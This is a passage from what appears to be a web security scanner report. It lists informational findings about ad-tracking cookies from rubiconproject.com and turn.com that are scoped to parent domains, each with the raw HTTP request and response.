rpx=4212%3D11993%2C1032%2C4%2C%2C%265421%3D11993%2C682%2C3%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%266432%3D12470%2C499%2C2%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C139%2C4%2C%2C%264120%3D13027%2C0%2C1%2C%2C%266811%3D13380%2C0%2C1%2C%2C

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1; expires=Thu, 11-Aug-2011 20:40:10 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.34. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tap.php?v=6811&cb=1310503191 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; put_2188=FoBpo1AIykup_RbIztZ-hw; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; cd=false; put_1986=3420415245200633085; put_1185=4325897289836481830; rpb=733%3D1%264338%3D1%267100%3D1%266560%3D1%266643%3D1%266198%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%267187%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1; rpx=4212%3D11993%2C1032%2C4%2C%2C%265421%3D11993%2C682%2C3%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C499%2C2%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%267187%3D12806%2C0%2C1%2C14%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C139%2C4%2C%2C%264120%3D13027%2C0%2C1%2C%2C; put_2132=E3F32BD05A8DDF4D5646D79640088B

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:39:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1; expires=Thu, 11-Aug-2011 20:39:53 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=4212%3D11993%2C1032%2C4%2C%2C%265421%3D11993%2C682%2C3%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%266432%3D12470%2C499%2C2%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C139%2C4%2C%2C%264120%3D13027%2C0%2C1%2C%2C%266811%3D13380%2C0%2C2%2C%2C; expires=Thu, 11-Aug-2011 20:39:53 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.35. http://r.turn.com/r/beacon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=homepage;ord=1294428578112.2744?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=jPCRKqrj87qIJxtlMQWAeEChT2n2hjlNeUtfI18EVvCY481wEkFtGX7HudJA1SwJI3d8wh-8F3M_mXcdjcS-VSm0eLaoIKxUGXp9LrfCkU9_tnfsaUjBl08t5WPRK0VURVro0VaYJSFBW8ummLzmaIKBmXLKaNQC_VstFH2_fFpKQkzhSzd0OA7TdBU9TjZEJGXtc03lRAW7XQ4DISJNToVALrQWz2MTLkxqGX2dkixiiuCgw-RUBPrhyXIonq-JO1Bp39fVI570M3anNYXEeUs1tPAJ0EW-1VMg8V7a5wldzyMGDGIyTnWkwLiiAh9MnoUAhDiUl9Tegk8e5loBtCPfUfWmFvuHa7ho64SbyNRCdB0gGLuWZn2SFARzFJPESwQcmlx05sJTCiLTcgCP4At5Nkw2i8ci7zeXoamyfIkXLuYA-Dhd_NCbS18tUNtNvkWLzJ6aRrpGreADONKQFjqdAq7HLak39li3oOzBb2LeZa7kJWdY4s3_LxRnaveh3zRKhr_QKICSCDvtEvXL5bc_DW9fRIIhGqjaZpBQKPuvEW4pltifd2UFOGJBUm-HNrIvCCgnCtouI-Uiugr_XDqnokT_uSlOVd9om3L3_Zyu-SvKhx26d2lgxRL2g7NnpnufmqwPr0iX6TO_QvAchAci1X1kdq4IOav-VGBUnPFENQMte8mJeFRkxXb-wFJ5RVro0VaYJSFBW8ummLzmaNGHuZ00Doye8JlLv5mr5PFKQkzhSzd0OA7TdBU9TjZEAKZ1XvhQcWRwSquFFdyqk27PUbblbYukMk_ukxgrNp1iiuCgw-RUBPrhyXIonq-JrVUsFGMjIsjG4wG8JccNY0s1tPAJ0EW-1VMg8V7a5wn-FB-cNjGuev6cKfXYBTnN0_vou2SdMt8u86ZsS3JrqiPfUfWmFvuHa7ho64SbyNQHZddyBwQ_bn6DeUZJIktJSwQcmlx05sJTCiLTcgCP4PkIlx5s8TLQpLlToa_KmjIJFHg-6pvIHl5Jd-boptVivkWLzJ6aRrpGreADONKQFi1uWhCbBLDkUUl3GB-cia7eZa7kJWdY4s3_LxRnavehkKIyZUcKn4gaSbbrzqSrcgqUnZs_qTc4J1uECWvW6WbTYemUMl4rww0Ahse7Jfbjh8YLajdpYA5oCRPEinWDNzqnokT_uSlOVd9om3L3_Zxs-1IWnYFHuATbbO_y4X0qnTAQXKSKZxRRHNLIhO3aIaSqEypMHifOKCbgAvu2-dYixi2mthDBgkkh8E1XVaeYRVro0VaYJSFBW8ummLzmaFVfdYHK1Q73JpHXN0tZ5ChKQkzhSzd0OA7TdBU9TjZE1kmOSSok1OTXuW9iz2m4nL5yE_6sd6seuxofVhtsYmBiiuCgw-RUBPrhyXIonq-JQurUvISATSSNOXvmuhMCV2KK4KDD5FQE-uHJciier4klqT8ZcugfJqC9EwK5ktSgSzW08AnQRb7VUyDxXtrnCWozIMOsCXwOUoX3GwmeVVAxi8wzskQPsxtBtldyMSwagsPhD5djythOHSHCTJOhXN8kothY4cGzuNEdryxzqqlLBByaXHTmwlMKItNyAI_gA5nIMgtWWpg9SGtTLubci8mKqUVNtCEf11hjerFm783rueT8thuReMGYM-G8N401JqMaNEKucbt7MzwWQQWU-d5lruQlZ1jizf8vFGdq96EVQq5esqu6oyUY2zlzU2xLXWhOIfbu6nlVGazQ3C00oYS8zm8KaUf2JPX_XkHFplCbza_ABfjL7BKJWmajZwI8OqeiRP-5KU5V32ibcvf9nKIPnlMyG4VsL_dpoB-0W9QGvLE_z_KyAskRioKbfxN_786M9IuI8BYnDc-poA-MUnfZxmx8Z1na_56NWnVp5lVFWujRVpglIUFby6aYvOZo-guTtl2FC1HRuw7-BKiPgkpCTOFLN3Q4DtN0FT1ONkRfEwEV-i4hDFcRNIjoo2NgkPVO08UdjTRS6iKsNti_SGKK4KDD5FQE-uHJciier4kPyz-Wufncl9LyPoL9B1QKSzW08AnQRb7VUyDxXtrnCYqBIOxmA7cQDFoERRAumqjQS-E5nxed_shBlbXuObLDI99R9aYW-4druGjrhJvI1JH00lIUEmEEA_OFUDNzutxLBByaXHTmwlMKItNyAI_g_3bTqCYCGbHkXEVzPY_01mXeNri_O61lm1ldtHVrpR7ZPRGnTyb4BtK8arS2F9YZe4UCz5TMA5hwrPrqery6C_wkRIQCoel50LHttKKxvj2T-81UMTQPlYAknpDpTSLEO5HiathQKE8omxVc53FpCRoxDfNmYDnxg0EvFrwRe3pCS4dcida2s-s0XQ4z8fCn0-2F-mOoQpGwjdYnRQCARZtq_gHnWf9fXfe0G5ZJVnGpH8LKKIm0TYD_Luo27v_Fd79BPBBGXhysRhWpW1cyG4cyxzjZGmjTf1aqiATmAjS8PU8Ims583iYmtl6BnonGOZ_I42pI-l997CutSY5UTnU6t7Hj0VsEozVWpOhdHdFbLfPqvGJUWoA-TUxLJGtuWy3z6rxiVFqAPk1MSyRrblst8-q8YlRagD5NTEska26shJ8rvIZ2pEIvj7vJYr_-ftZVQVVx5oyA1oNVdb0c2RvgUG90xsnNOLDcsndxj6Hfhp4cgON-zdligsRs6_1T34aeHIDjfs3ZYoLEbOv9U9-GnhyA437N2WKCxGzr_VPG0U7eaD3Hbtxwd0g2BAEnxtFO3mg9x27ccHdINgQBJ8qENCoPz5YPQkhGm2FiUj3LFz3e1wa31-DKI83R83jg3QTL9zDrzTFlXoiMqjuSWt0Ey_cw680xZV6IjKo7klpI3j9xuCx21BIxBdXN5YAR9AhrAwqavcLA2O6a4z37Lsij7qsRPo1Q9IcnQsYBZ5nZ4Yik6WYEG4S1yIWi95cAawB_d25XmA1YnkFKy4M4_IsLKOVSlL41zvQ6wOKAHEjq7nKInFrgoG_62xoiLBKT6u5yiJxa4KBv-tsaIiwSk-rucoicWuCgb_rbGiIsEpOvDsfne5seg63D4x3flsyZrw7H53ubHoOtw-Md35bMma8Ox-d7mx6DrcPjHd-WzJlOSrp14Y383TLXFJ1T7HeQDdh5RodnqZ0dgGASOf1Fng3YeUaHZ6mdHYBgEjn9RZ6k3CneyeK26bqX2BslrNlwDg97pn0xq8XVtSFY17J1rA4Pe6Z9MavF1bUhWNeydawOD3umfTGrxdW1IVjXsnWsZmDwoJlEZXfDBjNrKbkdHGZg8KCZRGV3wwYzaym5HRxmYPCgmURld8MGM2spuR0cbb0sPsXWgw_x9D6jnx5LK_2BhDosUowXxXmwB90G1tj9gYQ6LFKMF8V5sAfdBtbY_YGEOixSjBfFebAH3QbW2GhE7gFloT4X513bbUoowJpoRO4BZaE-F-dd221KKMCaaETuAWWhPhfnXdttSijAmjoFfr6E7AtWKXcAv7zPgNhKraltt_znEUtPzey_YSNRSq2pbbf85xFLT83sv2EjUUqtqW23_OcRS0_N7L9hI1Fz-QUXxY9m0RT2v_0PtAEz3vMJW6Nolrhqx2yRbBnwHeM8DMgjvm5t97BtYytOx4Rqhj3O8p-XR3nA6DvXKpTl; fc=NPwnTj55SxablmgxgOU6YvTAau0fxQm9Ss2FVtOc0fRwe2fiMiJstcorldPAQEWsjtR00WuVUesotFeF8b0iqzTwskhjzr5X5fLnW2Y1L8oWeSZAoSqfzCTWGJqSVzUxwmWj6rOwJQbNe1FGkQ72Mr3ZyRv0KSWu8UtGn86vdZZ2Bxw8hDOLkguYqml5zW-MINBiIQ09VuaB6H4kNZ3jvWDXo_Ub5NvFSqNxsTqhNOEJzdGEYQUbYRsENlG1EkxlHr-vpMpIww2oeMaNqJcAGNVCVYgScgvT-7lnf3tWEtoI26ZIhO_EYD2Jv5etTb7nPXORZ_ihz3v_EDqUfBGd38kaFp7wmgHwSln4BB0aAU-Y-fE6mCrmAAKxJpNINZh0gYrE3U6bhGdZv_0Ofvauqo02tkR5MgBK5U8r1oXGHyKLM2r82BMAlsOE4kKakojRElg7FxL2FmmNWsvuLk3EV1Ob1kR0cv3Vim-wWYu2PuOaPtJF5zGBev3l88f3V44c; pf=Cx8u84bEVqWzcxtUTzqNJIC7M-V0K1YOk9JpwDx9iJ-IAwkcA0x7pAMOQ8HX-tAorSoba3JeN-xk7oapFFvy3VH1kGUf_WpfPdQV1CZyaCYHdxKvkIPObEkSzEZrTaygnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB8lg8V6tRDdbWqGKQtvjC13uBmE_sR164gzV3uysVQ2QdRHkJfimLFS7WOEQG6pvwSUmGlP7plGVHEv-ZxqEZIrcXFzn59VucOMk1jaoS14k8c8mLEcBETNnyzMsneeF1syYFCrcdo0CAg55mHqrIrWWaQmkKSFcJcPgoCKH0sJxrIzPzQpSNx_CIsd1kfXDyjA2LDFvKhvZ1QEIEm7dh40PZjNQZ9Hd8MNm3JX-_S9NWe8WHK4NSvES3Z9QGGhu5Djvyp-YMlPmNhLTDojIlhjAjhS9eWzjsUsw9SoKtKpC8f_2RWCzOUGxk_Wz1rfZiWbxbJrTUf-aVzxXXriNIKNdAUsvGjo4dYjRw0gI-IRCZzMEukVXPbKwT_hFRpA_sDy9QeL7VpgT4tBIngc08Ws8FJltK3E8OgPtJy7Eoz0CJTXR5HKs3-hHShC6aRn6t8BfcQz0Dd86t8gXoPdMBgjtbxBbJEH3dHhKkO193ago_XUFSyzIOxm_x0ybvjW_DUjtRNJhmcOwDiyv8T_KQGDJqVkw-kV9dntkmeBLp5GGHSF_cakLXoawmQZ1OX2qeRpP5uEXb79RoRHLsAMGKSCy052Li315VZE1PNankBD1hqe7zgE_PsLCVtuTX5L-v-S8ut840ECOM1HdJH7s33O1_AQ4vnHmUUW7H59jc99zMgQ2O6JOMOztY9nPjblaNmLc_7YgA59y0a1NS04dNn076vc7MQQckLwsVvHiz-KvY1jzkP4PDCgK5hta8dPDsz-8OsEQFzGgGCvF0GIxS5Nbkr7--zZc_wQ6biDWOUTMZ5Aed2sucJPSwXllukkVa8jtckMV353gLOstRvTs7wASU8WY0U8nc5T3Av462s8LVUtne46_vE-foJkYKgxvmOzPagHCwrL0iRXFbrF0GCQ-kKVv-DNPSwltjGZxUewqaXFK9zRqsdpcWcQFcqw3510ThZFcxTfyigoCKl2TzGDotY3DBS9xlfQHYC5NuwXhkTkrJJbSXHXzZwKdWOAUKxEjjU_DLSyuHljlkbCfX905581fc21Bgmh6aLYPJTQgHe0BGkQOaCtNgR397GwlpFMpZQrcO6DVQmpJqLrCO7vWAYrQFbx5r__P2OsEwDabv6-ufGYt0XCG8E1NsefbXzsQG48Hb_4YCrX9j8YOFwzlL7wHF61n06A78wdBUnw_3qGk8dpf23zBzZ7_iSkW1LOMSCUhd0R0x_cMO6r5__qTaR3ipdUC2utivZgqLqHLD-yqO6fpR1lhP8Zedk0K33X5JX5XybzWTLoWHcBwhx12hxg_p42eTH3yUmVmrDFWtD-IWnXZh1DCyIriOz-euhSpNmXzKI7JHUzsQgubpCr0mdnzZcTmsylkJAW1ccTwu_iUiq76dV6KWv7ygWscTVmC3YMVvTh6_xY8MMl9E6n-9RK0_l1NeBTl2ILEX52m6Q5kUHHzsBztnLAvmGkYSq8tICkY-ZC5dDhZ5KTLIH_WRUAyZF0LVsouafm1vlWe8-kD_qlMWuKHZ35EkcV9gvNX-0wo3lOomVgKFrOcQT6xUJWITG_43_30FYpbAkMd7Zbz-AKt6UVPMV5C7YzmVgAWIMgrao83tjG2LhMgTlrEosdVyiYkUv0nonkKf66fnnlOzVyS438ol7N4GeGwHdaOglNTO5ywZIRQinOutEqt6KbKBEKntCrb7D6e9iRa3ianVsa8MiDHTEWIi5V0LqJtieKL24UwL5hJC4BX20Zz5y_GGgIdUuyJds9aivGRyjWcqpaPTAjzGh5JPWCUUY_ncjEyl8hW5m6EeUIZscn-4DKBwi99P9RjrZE_dPetOdSseWVwQIkyfdrdePcNT3WyEkrexuDA-qqk5NTFsC_ByQmpvwrjjDb0J7HUp1JPqiZqnwZ2Go5gFw87E0mX-gZbv9puVGpdNS4dePD3rEUqTIjSZFc7HCOlZdFTBhQt4A-FXt7HgLTPKjvKf5KVmvAPipFhdTouhjm4kPiXzApwuLyi6QSYFNiPyjgY3lBpe16jsizuDZnGlGarhWrjLVHCsfqBtkFSkk1SR2w_LQXcfc7DxO-UAUeZsKJ1LvJSuWsg1SH4N8_SCcaTqmc1uF1dp4fIimKkPNOg_dvWujk-Cj7VuMxKaYMlwrje52Uk5uf9NUjcjmDMF-1AlpBVtJMI6JGdCbY2NTrM7fSz49bOAjLW0MnQwDQa-Nv56fQL3xrXetwOaAY94pbLyYsPY_cQCBLLJhWVnk_lzn51ZCBNx7hJnm5dzmxgMi0veCS6T8Z5drmGjNmeb-gwzIMUAVsybSv6VHcWhnJ7FV4AblxMpEP0Y4Z9EqMnp8_Ptdh8Vlhtd1gYA-UFdmq3XbM_G1i3gFKk4PvEglQliEj-apgE-QUPu46suvh10d0G0S8DH0wFapdtYn6ohVZwB_sfttfT1YXUa_yXy15CD2u-uL2x0k24zeqEwhSpaHXsFwWxuCYlbx3sc8b_L2880suANXVY7RQ0ghbVhqjWmaKlZJZyI31XFJMg_Xm3ZaeTQQI_73qieHyLOUlYyXWWsmaKjBW9zGwtWdK7Mq4vwOBlARYld_nFauuoG4pRJN5QW0S4Ab_1nMPuF7At7uTRRiqDaV84E--0JgS5fcQqBMnq0HjkRtgk-XMCUZPiJUYVr5I10hlfZFNvymYKjSCq8EtoB0SCR3g100hLwHmY-Bd0Px_ERQa4V8H03Ad47KIDq9L6hWd8EKxxuk70qq5bXgGe0BBwIcaAGo124_Fpc9B9PFgRwf7L48PocBRONLy3d-V4PRgNjGQd8w36iokpDpKkptN7UsKIOKbVuNydbjtyAC4c1Iwtu4KcdbHriwFkNHZ84RB467ymyeh38Hrbp8Hb8-H8l8B1Z3JWEnD4C5pe-t0ccouIbg8SdMpwrtgnNNEVhmnTlU60JId0MOL6TZt0DdlgiUII8665euFIvTFi1kq9Jbjc-hN8nNe5t33s_4slnCqQsf7S3WAlj03YWHyJRno5upAQH1stolYHPvqQTECcUpZ67ooRzBV4mkY3bKZEn_LF-ss2qc9_oFL9fN5_ShqXOpZWPh4CRijgdjXszUE1r9Us2uEGPpDbSA5CU09EIO8uHCZTpQ2E0CSOfk4oag3R69kTz8pBBQ8HMWQVbWm; uid=4325897289836481830; rrs=3%7C6%7C9%7C4%7C1002%7C1005%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C18%7C2%7C5%7C1001%7C1004%7C1007; rds=15156%7C15153%7C15156%7C15167%7C15161%7C15153%7C15149%7C15146%7C15151%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153; rv=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sun, 08-Jan-2012 16:35:47 GMT; Path=/
Set-Cookie: pf=S75Tx67zHlqJEqjM2EpYohyQmYHijzPhSURiZdWBt_mIAwkcA0x7pAMOQ8HX-tAoPwLHSpO1dFMRfUIqRRj7O8Bymq9LvAUz5_ne2Gc83NMHdxKvkIPObEkSzEZrTaygnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB_wu9pn5eTDfXokdHWgv_KeSzTQwXISudy28fYFPvd3f8VkEPtv4pKGwYcW3D48lxwQzHAAbxKgRVL2b1l3a-ZYStRSAsLDg3EjDE1-MNGS5MvaPliD3cX9A60XNjJY548KG_WLadoSJGb4bjShEkEZMGlUJzSoxDtdJd5C-xayMUeIxLF_gu6KpFvskgSkqDyRvL1xj_WZGBHL7tmny3OF86KonSkyTJZS2Pe0J-pv-0ZlHM0GPFGGYjp0ziZtko5hTj6dXRRh4QZTEXVL-ge7iEWTOvmvi1zjeqbpxK565E7aFVyxKpvzjSVsAgZL25tnEZo1QLIx3A2B_Zq8odU2eiU467uOPvqZNUB0D-Z1h-Ye081m6oj-PGJfEQ6zkfS-V8iUpuZ8eodRw_lv4giezXN6TUonRbapcFN61G2o5g0IZKzKM_gBe3dP1E8FWQkM2fHCdNoeFK3r8z3rr_IMZGe2RqXjfUSv4PoS9BBdLPDTtDv5lO-7qW24wGeBDKGVRc1PUdvmcIfa70fwlgva-qLtly5tg-N0KJMS8LqLG_FacEC-83hgcFizrbdl-nuZiKc3wX7GiaI0EAPGkBVFePfSQ9yWsEBRfjuW4AHrUV5yIcO0NRkDqgMD2WAQJbF49vWqArbDJ0yoqifuBT8rwLezGBmoueobB2WMNaTxX7mxpMrQn0yES1bZJmLjjZIAkmIJxZ7xeYCj5l4gUPXVoOVFXuczpXr_MUqk_vCUthA8oixyElU3ANl1dD2qYov9BuL8l-AQdbit5mSqhcAge1f9v2DKdrS7tpbkEM0iqxaG6RswzxutKhO2dQbnqnli05-eD_Or7WQnS-BLdBqYTneq0zKFqU49VNcF9tmltxT1NaEJFhMivfKM5iLXXLqA3JaBVqauWRwqI8S_3Fn-BME0WtjmL-sTf3Nf93Yws_1ud7s0IRU8-3diGW0YihRapWhNVwJ8XDqeMYmLmHyM3mIk7c61SB7-8FMxyiC0cSExJSH89TrP0KtOzOBfTvxHeJg54zjksNPu1zZwzGr7u7c4UKg_yErLQJ0YMrQaTHe0BGkQOaCtNgR397GwlpFMpZQrcO6DVQmpJqLrCO7vWAYrQFbx5r__P2OsEwDabv6-ufGYt0XCG8E1NsefbXzsQG48Hb_4YCrX9j8YOFwzlL7wHF61n06A78wdBUnw_3qGk8dpf23zBzZ7_iSkW1LOMSCUhd0R0x_cMO6r5__qTaR3ipdUC2utivZgqLqHLD-yqO6fpR1lhP8Zedk0K33X5JX5XybzWTLoWHcBwhx12hxg_p42eTH3yUmVmrDFWtD-IWnXZh1DCyIriOz-euhSpNmXzKI7JHUzsQgubpCr0mdnzZcTmsylkJAW1ccTwu_iUiq76dV6KWv7ygWscTVmC3YMVvTh6_xY8MMl9E6n-9RK0_l1NeBTl2ILEX52m6Q5kUHHzsBztnLAvmGkYSq8tICkY-ZC5dDhZ5KTLIH_WRUAyZF0LVsouafm1vlWe8-kD_qlMWuKHZ35EkcV9gvNX-0wo3lOomVgKFrOcQT6xUJWITG_43_30FYpbAkMd7Zbz-AKt6UVPMV5C7YzmVgAWIMgrao83tjG2LhMgTlrEosdVyiYkUv0nonkKf66fnnlOzVyS438ol7N4GeGwHdaOglNTO5ywZIRQinOutEqt6KbKBEKntCrb7D6e9iRa3ianVsa8MiDHTEWIi5V0LqJtieKL24UwL5hJC4BX20Zz5y_GGgIdUuyJds9aivGRyjWcqpaPTAjzGh5JPWCUUY_ncjEyl8hW5m6EeUIZscn-4DKBwi99P9RjrZE_dPetOdSseWVwQIkyfdrdePcNT3WyEkrexuDA-qqk5NTFsC_ByQmpvwrjjDb0J7HUp1JPqiZqnwZ2Go5gFw87E0mX-gZbv9puVGpdNS4dePD3rEUqTIjSZFc7HCOlZdFTBhQt4A-FXt7HgLTPKjvKf5KVmvAPipFhdTouhjm4kPiXzApwuLyi6QSYFNiPyjgY3lBpe16jsizuDZnGlGarhWrjLVHCsfqBtkFSkk1SR2w_LQXcfc7DxO-UAUeZsKJ1LvJSuWsg1SH4N8_SCcaTqmc1uF1dp4fIimKkPNOg_dvWujk-Cj7VuMxKaYMlwrje52Uk5uf9NUjcjmDMF-1AlpBVtJMI6JGdCbY2NTrM7fSz49bOAjLW0MnQwDQa-Nv56fQL3xrXetwOaAY94pbLyYsPY_cQCBLLJhWVnk_lzn51ZCBNx7hJnm5dzmxgMi0veCS6T8Z5drmGjNmeb-gwzIMUAVsybSv6VHcWhnJ7FV4AblxMpEP0Y4Z9EqMnp8_Ptdh8Vlhtd1gYA-UFdmq3XbM_G1i3gFKk4PvEglQliEj-apgE-QUPu46suvh10d0G0S8DH0wFapdtYn6ohVZwB_sfttfT1YXUa_yXy15CD2u-uL2x0k24zeqEwhSpaHXsFwWxuCYlbx3sc8b_L2880suANXVY7RQ0ghbVhqjWmaKlZJZyI31XFJMg_Xm3ZaeTQQI_73qieHyLOUlYyXWWsmaKjBW9zGwtWdK7Mq4vwOBlARYld_nFauuoG4pRJN5QW0S4Ab_1nMPuF7At7uTRRiqDaV84E--0JgS5fcQqBMnq0HjkRtgk-XMCUZPiJUYVr5I10hlfZFNvymYKjSCq8EtoB0SCR3g100hLwHmY-Bd0Px_ERQa4V8H03Ad47KIDq9L6hWd8EKxxuk70qq5bXgGe0BBwIcaAGo124_Fpc9B9PFgRwf7L48PocBRONLy3d-V4PRgNjGQd8w36iokpDpKkptN7UsKIOKbVuNydbjtyAC4c1Iwtu4KcdbHriwFkNHZ84RB467ymyeh38Hrbp8Hb8-H8l8B1Z3JWEnD4C5pe-t0ccouIbg8SdMpwrtgnNNEVhmnTlU60JId0MOL6TZt0DdlgiUII8665euFIvTFi1kq9Jbjc-hN8nNe5